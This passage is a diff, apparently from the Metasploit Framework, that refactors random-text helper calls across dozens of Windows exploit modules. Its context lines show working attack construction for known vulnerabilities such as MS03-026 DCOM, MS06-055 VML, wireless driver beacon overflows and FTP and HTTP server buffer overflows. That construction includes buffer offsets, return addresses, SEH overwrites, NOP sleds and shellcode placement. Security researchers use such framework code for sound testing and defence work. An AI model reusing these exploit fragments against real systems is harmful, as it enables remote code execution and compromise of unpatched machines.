var_timer = "_"+rand_text_alpha(rand(6)+3)
|
||||||
rnd = rand(2)
|
rnd = rand(2)
|
||||||
var_setTimeout = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
|
var_setTimeout = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
|
||||||
var_setInterval = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
|
var_setInterval = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -85,14 +85,14 @@ class Exploits::Windows::Browser::MS06_055_VML_Overflow < Msf::Exploit::Remote
|
||||||
buffer = ("&#x" + addr_word + ";") * buflen
|
buffer = ("&#x" + addr_word + ";") * buflen
|
||||||
|
|
||||||
# Generate a random XML namespace for VML
|
# Generate a random XML namespace for VML
|
||||||
xmlns = Rex::Text.rand_text_alpha(rand(30)+2)
|
xmlns = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
# Randomize the javascript variable names
|
# Randomize the javascript variable names
|
||||||
var_buffer = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_buffer = rand_text_alpha(rand(30)+2)
|
||||||
var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_shellcode = rand_text_alpha(rand(30)+2)
|
||||||
var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_unescape = rand_text_alpha(rand(30)+2)
|
||||||
var_x = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_x = rand_text_alpha(rand(30)+2)
|
||||||
var_i = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_i = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
# Build out the message
|
# Build out the message
|
||||||
content = %Q|
|
content = %Q|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,16 +70,16 @@ class Exploits::Windows::Browser::MS06_057_WebView_SetSlice < Msf::Exploit::Remo
|
||||||
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
|
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
|
||||||
|
|
||||||
# Randomize the javascript variable names
|
# Randomize the javascript variable names
|
||||||
var_buffer = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_buffer = rand_text_alpha(rand(30)+2)
|
||||||
var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_shellcode = rand_text_alpha(rand(30)+2)
|
||||||
var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_unescape = rand_text_alpha(rand(30)+2)
|
||||||
var_x = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_x = rand_text_alpha(rand(30)+2)
|
||||||
var_i = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_i = rand_text_alpha(rand(30)+2)
|
||||||
var_tic = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_tic = rand_text_alpha(rand(30)+2)
|
||||||
var_toc = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_toc = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
# Randomize HTML data
|
# Randomize HTML data
|
||||||
html = Rex::Text.rand_text_alpha(rand(30)+2)
|
html = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
# Build out the message
|
# Build out the message
|
||||||
content = %Q|
|
content = %Q|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -93,7 +93,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
"<script>" +
|
"<script>" +
|
||||||
"document.location='" +
|
"document.location='" +
|
||||||
get_resource + '/' +
|
get_resource + '/' +
|
||||||
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
rand_text_alphanumeric(rand(80)+16) +
|
||||||
".pls'</script>" +
|
".pls'</script>" +
|
||||||
"One second please...</body></html>"
|
"One second please...</body></html>"
|
||||||
send_response_html(cli, html)
|
send_response_html(cli, html)
|
||||||
|
@ -115,7 +115,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
pcnt = rand(10)+10;
|
pcnt = rand(10)+10;
|
||||||
|
|
||||||
file = Rex::Text.rand_text_english(1026)
|
file = rand_text_english(1026)
|
||||||
file[1022 , 4] = [target.ret].pack('V')
|
file[1022 , 4] = [target.ret].pack('V')
|
||||||
file[0, payload.encoded.length] = payload.encoded
|
file[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
|
@ -130,7 +130,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
def generate_space
|
def generate_space
|
||||||
if datastore['PlaylistSpaceInjection'] == true
|
if datastore['PlaylistSpaceInjection'] == true
|
||||||
return Rex::Text.rand_text(rand(100)+1, nil, " \t")
|
return rand_text(rand(100)+1, nil, " \t")
|
||||||
else
|
else
|
||||||
return ''
|
return ''
|
||||||
end
|
end
|
||||||
|
@ -138,7 +138,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
def generate_song(id, file)
|
def generate_song(id, file)
|
||||||
return generate_line("File#{id}", file) +
|
return generate_line("File#{id}", file) +
|
||||||
generate_line("Title#{id}", Rex::Text.rand_text_alphanumeric(rand(64)+1)) +
|
generate_line("Title#{id}", rand_text_alphanumeric(rand(64)+1)) +
|
||||||
generate_line("Length#{id}", "%x" % (rand(1024) + 30))
|
generate_line("Length#{id}", "%x" % (rand(1024) + 30))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -149,7 +149,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
def generate_songs(cnt)
|
def generate_songs(cnt)
|
||||||
songs = ''
|
songs = ''
|
||||||
1.upto(cnt) do |i|
|
1.upto(cnt) do |i|
|
||||||
songs << generate_song(i, Rex::Text.rand_text_alphanumeric(rand(64)+1))
|
songs << generate_song(i, rand_text_alphanumeric(rand(64)+1))
|
||||||
end
|
end
|
||||||
return songs
|
return songs
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,10 +66,10 @@ class Exploits::Windows::Browser::Xmplay_Asx < Msf::Exploit::Remote
|
||||||
# Re-generate the payload
|
# Re-generate the payload
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(cli)) == nil)
|
||||||
|
|
||||||
drv = Rex::Text.rand_text_alpha_upper(1)
|
drv = rand_text_alpha_upper(1)
|
||||||
ext = Rex::Text.rand_text_alpha_upper(3)
|
ext = rand_text_alpha_upper(3)
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alpha_upper(498) + [ target.ret ].pack('V')
|
sploit = rand_text_alpha_upper(498) + [ target.ret ].pack('V')
|
||||||
sploit << make_nops(40) + payload.encoded
|
sploit << make_nops(40) + payload.encoded
|
||||||
|
|
||||||
# Build the stream format
|
# Build the stream format
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
print_status("Bound to #{handle} ...")
|
print_status("Bound to #{handle} ...")
|
||||||
|
|
||||||
# Carefully create the combination of addresses and code for cross-os exploitation
|
# Carefully create the combination of addresses and code for cross-os exploitation
|
||||||
xpseh = Rex::Text.rand_text_alphanumeric(360, payload_badchars)
|
xpseh = rand_text_alphanumeric(360, payload_badchars)
|
||||||
|
|
||||||
# Jump to [esp-4] - (distance to shellcode)
|
# Jump to [esp-4] - (distance to shellcode)
|
||||||
jmpsc =
|
jmpsc =
|
||||||
|
@ -137,7 +137,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
|
|
||||||
nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
|
nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
|
||||||
Rex::Text.rand_text(2, payload_badchars)
|
rand_text(2, payload_badchars)
|
||||||
|
|
||||||
nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
|
nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
|
||||||
nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
|
nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
|
||||||
|
@ -149,7 +149,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
nt4sp3jmpback
|
nt4sp3jmpback
|
||||||
|
|
||||||
# Pad to the magic value of 118 bytes
|
# Pad to the magic value of 118 bytes
|
||||||
ntshiz += Rex::Text.rand_text(118 - ntshiz.length, payload_badchars)
|
ntshiz += rand_text(118 - ntshiz.length, payload_badchars)
|
||||||
|
|
||||||
# Create the evil UNC path used in the overflow
|
# Create the evil UNC path used in the overflow
|
||||||
uncpath =
|
uncpath =
|
||||||
|
@ -165,13 +165,13 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
[ target['Rets'][1] ].pack('V') + # Writable address on 2000 and jmp for NT 4.0
|
[ target['Rets'][1] ].pack('V') + # Writable address on 2000 and jmp for NT 4.0
|
||||||
make_nops(88) +
|
make_nops(88) +
|
||||||
Rex::Arch::X86.jmp_short(4) +
|
Rex::Arch::X86.jmp_short(4) +
|
||||||
Rex::Text.rand_text(4, payload_badchars) +
|
rand_text(4, payload_badchars) +
|
||||||
make_nops(8) +
|
make_nops(8) +
|
||||||
Rex::Arch::X86.jmp_short(4) +
|
Rex::Arch::X86.jmp_short(4) +
|
||||||
Rex::Arch::X86.jmp_short(4) +
|
Rex::Arch::X86.jmp_short(4) +
|
||||||
make_nops(4) +
|
make_nops(4) +
|
||||||
Rex::Arch::X86.jmp_short(4) +
|
Rex::Arch::X86.jmp_short(4) +
|
||||||
Rex::Text.rand_text(4, payload_badchars) +
|
rand_text(4, payload_badchars) +
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
ntshiz +
|
ntshiz +
|
||||||
xpseh +
|
xpseh +
|
||||||
|
@ -184,7 +184,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
NDR.long(0) +
|
NDR.long(0) +
|
||||||
NDR.long(0) +
|
NDR.long(0) +
|
||||||
|
|
||||||
Rex::Text.rand_text(16) +
|
rand_text(16) +
|
||||||
|
|
||||||
NDR.long(0) +
|
NDR.long(0) +
|
||||||
NDR.long(0) +
|
NDR.long(0) +
|
||||||
|
|
|
@ -103,7 +103,7 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
|
||||||
queue_hlen = datastore['HNAME'].length * 2
|
queue_hlen = datastore['HNAME'].length * 2
|
||||||
queue_path = unicode(queue_name + "\\PRIVATE$\\")
|
queue_path = unicode(queue_name + "\\PRIVATE$\\")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(4000, payload_badchars)
|
buf = rand_text_english(4000, payload_badchars)
|
||||||
|
|
||||||
# Windows 2000 SEH offset goes first
|
# Windows 2000 SEH offset goes first
|
||||||
buf[332 + queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')
|
buf[332 + queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -175,7 +175,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
|
|
||||||
# timestamp value
|
# timestamp value
|
||||||
Rex::Text.rand_text_alphanumeric(8) +
|
rand_text_alphanumeric(8) +
|
||||||
"\x64\x00" + # beacon interval
|
"\x64\x00" + # beacon interval
|
||||||
"\x11\x04" + # capability flags
|
"\x11\x04" + # capability flags
|
||||||
|
|
||||||
|
@ -193,7 +193,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
||||||
"\xff\xe1" + # jmp ecx
|
"\xff\xe1" + # jmp ecx
|
||||||
|
|
||||||
# padding
|
# padding
|
||||||
Rex::Text.rand_text_alphanumeric(79) +
|
rand_text_alphanumeric(79) +
|
||||||
|
|
||||||
# return address
|
# return address
|
||||||
[target.ret].pack('V') +
|
[target.ret].pack('V') +
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -164,12 +164,12 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
||||||
|
|
||||||
def create_beacon
|
def create_beacon
|
||||||
|
|
||||||
ssid = Rex::Text.rand_text_alphanumeric(6)
|
ssid = rand_text_alphanumeric(6)
|
||||||
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
|
bssid = ("\x00" * 2) + rand_text(4)
|
||||||
src = ("\x90" * 4) + "\xeb\x2b"
|
src = ("\x90" * 4) + "\xeb\x2b"
|
||||||
seq = [rand(255)].pack('n')
|
seq = [rand(255)].pack('n')
|
||||||
|
|
||||||
buff = Rex::Text.rand_text(75)
|
buff = rand_text(75)
|
||||||
buff[0, 2] = "\xeb\x49"
|
buff[0, 2] = "\xeb\x49"
|
||||||
buff[71, 4] = [target.ret].pack('V')
|
buff[71, 4] = [target.ret].pack('V')
|
||||||
|
|
||||||
|
@ -181,7 +181,7 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
||||||
src + # src
|
src + # src
|
||||||
bssid + # bssid
|
bssid + # bssid
|
||||||
seq + # seq
|
seq + # seq
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
rand_text(8) + # timestamp value
|
||||||
"\x64\x00" + # beacon interval
|
"\x64\x00" + # beacon interval
|
||||||
"\x00\x05" + # capability flags
|
"\x00\x05" + # capability flags
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -167,11 +167,11 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
||||||
|
|
||||||
def create_beacon
|
def create_beacon
|
||||||
|
|
||||||
ssid = Rex::Text.rand_text_alphanumeric(16)
|
ssid = rand_text_alphanumeric(16)
|
||||||
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
|
bssid = ("\x00" * 2) + rand_text(4)
|
||||||
src = ("\x00" * 2) + Rex::Text.rand_text(4)
|
src = ("\x00" * 2) + rand_text(4)
|
||||||
seq = [rand(255)].pack('n')
|
seq = [rand(255)].pack('n')
|
||||||
stamp = Rex::Text.rand_text(8)
|
stamp = rand_text(8)
|
||||||
|
|
||||||
frame =
|
frame =
|
||||||
"\x80" + # type/subtype
|
"\x80" + # type/subtype
|
||||||
|
@ -183,7 +183,7 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
||||||
seq + # seq
|
seq + # seq
|
||||||
stamp + # timestamp value
|
stamp + # timestamp value
|
||||||
"\x64\x00" + # beacon interval
|
"\x64\x00" + # beacon interval
|
||||||
Rex::Text.rand_text(2) + # capability flags
|
rand_text(2) + # capability flags
|
||||||
|
|
||||||
# ssid tag
|
# ssid tag
|
||||||
"\x00" + ssid.length.chr + ssid +
|
"\x00" + ssid.length.chr + ssid +
|
||||||
|
@ -202,7 +202,7 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
||||||
"\xff\xe7" # jmp edi
|
"\xff\xe7" # jmp edi
|
||||||
|
|
||||||
# Overwrite enough to pop the return
|
# Overwrite enough to pop the return
|
||||||
buf = Rex::Text.rand_text(1160)
|
buf = rand_text(1160)
|
||||||
|
|
||||||
# Kernel-mode stager fun goes here
|
# Kernel-mode stager fun goes here
|
||||||
buf[0, payload.encoded.length] = payload.encoded
|
buf[0, payload.encoded.length] = payload.encoded
|
||||||
|
@ -214,7 +214,7 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
||||||
buf[1113, jumper.length] = jumper
|
buf[1113, jumper.length] = jumper
|
||||||
|
|
||||||
# Pad it out to be a valid set of IEs
|
# Pad it out to be a valid set of IEs
|
||||||
frame << ie_padding(buf) {|c| Rex::Text.rand_text(c) }
|
frame << ie_padding(buf) {|c| rand_text(c) }
|
||||||
|
|
||||||
return frame
|
return frame
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -94,7 +94,7 @@ class Exploits::Windows::Ftp::ThreeCeeDaemonFTPUserOverflow < Msf::Exploit::Remo
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(2048, payload_badchars)
|
buf = rand_text_english(2048, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[229, seh.length] = seh
|
buf[229, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -68,7 +68,7 @@ class Exploits::Windows::Ftp::Cesarftp_Mkd < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect_login
|
connect_login
|
||||||
|
|
||||||
sploit = "\n" * 671 + Rex::Text.rand_text_english(3, payload_badchars)
|
sploit = "\n" * 671 + rand_text_english(3, payload_badchars)
|
||||||
sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded
|
sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,8 +70,8 @@ class Exploits::Windows::Ftp::Freeftpd_key_exchange < Msf::Exploit::Remote
|
||||||
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
||||||
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
||||||
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
||||||
sploit << Rex::Text.rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
||||||
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(19000) + "\r\n"
|
sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
|
||||||
|
|
||||||
res = sock.recv(40)
|
res = sock.recv(40)
|
||||||
if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
|
if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -92,7 +92,7 @@ class Exploits::Windows::Ftp::FreeFTPDUserOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(1816, payload_badchars)
|
buf = rand_text_english(1816, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[1008, seh.length] = seh
|
buf[1008, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -107,7 +107,7 @@ class Exploits::Windows::Ftp::NetTermNetFTPOverflow < Msf::Exploit::Remote
|
||||||
# R push edx
|
# R push edx
|
||||||
# \x20\xC0 and al, al
|
# \x20\xC0 and al, al
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(8192, payload_badchars)
|
buf = rand_text_english(8192, payload_badchars)
|
||||||
buf[0, 1] = "\xc0"
|
buf[0, 1] = "\xc0"
|
||||||
buf[1, payload.encoded.length] = payload.encoded
|
buf[1, payload.encoded.length] = payload.encoded
|
||||||
buf[1014, 4] = [ target.ret ].pack('V')
|
buf[1014, 4] = [ target.ret ].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -80,8 +80,8 @@ class Exploits::Windows::Ftp::Oracle9iXDPPassOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
usr = Rex::Text.rand_text_english(rand(8)+1, payload_badchars)
|
usr = rand_text_english(rand(8)+1, payload_badchars)
|
||||||
buf = Rex::Text.rand_text_english(1292, payload_badchars)
|
buf = rand_text_english(1292, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[442, seh.length] = seh
|
buf[442, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -81,7 +81,7 @@ class Exploits::Windows::Ftp::Oracle9iXDBUnlockOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(1130, payload_badchars)
|
buf = rand_text_english(1130, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[322, seh.length] = seh
|
buf[322, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -74,7 +74,7 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_alphanumeric(8192)
|
buf = rand_text_alphanumeric(8192)
|
||||||
buf[498, 4] = [ 0x7ffd3001 ].pack('V')
|
buf[498, 4] = [ 0x7ffd3001 ].pack('V')
|
||||||
buf[514, 4] = [ target.ret ].pack('V')
|
buf[514, 4] = [ target.ret ].pack('V')
|
||||||
buf[518, 4] = [ target.ret ].pack('V')
|
buf[518, 4] = [ target.ret ].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -67,7 +67,7 @@ class Exploits::Windows::Ftp::Wsftp_Server_505_Xmd5 < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(676, payload_badchars)
|
sploit = rand_text_alphanumeric(676, payload_badchars)
|
||||||
sploit << [target.ret].pack('V') + payload.encoded
|
sploit << [target.ret].pack('V') + payload.encoded
|
||||||
|
|
||||||
send_cmd( ['XMD5', sploit] , false)
|
send_cmd( ['XMD5', sploit] , false)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -89,7 +89,7 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
user_cook = Rex::Text.rand_text_alphanumeric(2)
|
user_cook = rand_text_alphanumeric(2)
|
||||||
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
||||||
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -65,8 +65,8 @@ class Exploits::Windows::Http::Edirectory_Host < Msf::Exploit::Remote
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = "GET /nds HTTP/1.1" + "\r\n"
|
sploit = "GET /nds HTTP/1.1" + "\r\n"
|
||||||
sploit << "Host: " + Rex::Text.rand_text_alphanumeric(9, payload_badchars)
|
sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
|
||||||
sploit << "," + Rex::Text.rand_text_alphanumeric(719, payload_badchars)
|
sploit << "," + rand_text_alphanumeric(719, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit[705, seh.length] = seh
|
sploit[705, seh.length] = seh
|
||||||
sploit << "\r\n\r\n"
|
sploit << "\r\n\r\n"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -68,7 +68,7 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
|
||||||
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
|
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
|
||||||
|
|
||||||
req << "page=notify&origname=&action=return&type=Beeper&instancename="
|
req << "page=notify&origname=&action=return&type=Beeper&instancename="
|
||||||
req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
|
req << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
|
||||||
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
|
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
|
||||||
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
|
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,12 +66,12 @@ class Exploits::Windows::Http::Maxdb_Webdbm_Dbname_Overflow < Msf::Exploit::Remo
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
server = Rex::Text.rand_text_english(5, payload_badchars)
|
server = rand_text_english(5, payload_badchars)
|
||||||
user = Rex::Text.rand_text_english(5, payload_badchars)
|
user = rand_text_english(5, payload_badchars)
|
||||||
pass = Rex::Text.rand_text_english(5, payload_badchars)
|
pass = rand_text_english(5, payload_badchars)
|
||||||
port = rand(65535).to_s
|
port = rand(65535).to_s
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(91, payload_badchars) + [target.ret].pack('V')
|
sploit = rand_text_alphanumeric(91, payload_badchars) + [target.ret].pack('V')
|
||||||
sploit << payload.encoded
|
sploit << payload.encoded
|
||||||
|
|
||||||
req = "Event=DBM_LOGON&Action=LOGON&Server=#{server}&Database=#{sploit}"
|
req = "Event=DBM_LOGON&Action=LOGON&Server=#{server}&Database=#{sploit}"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
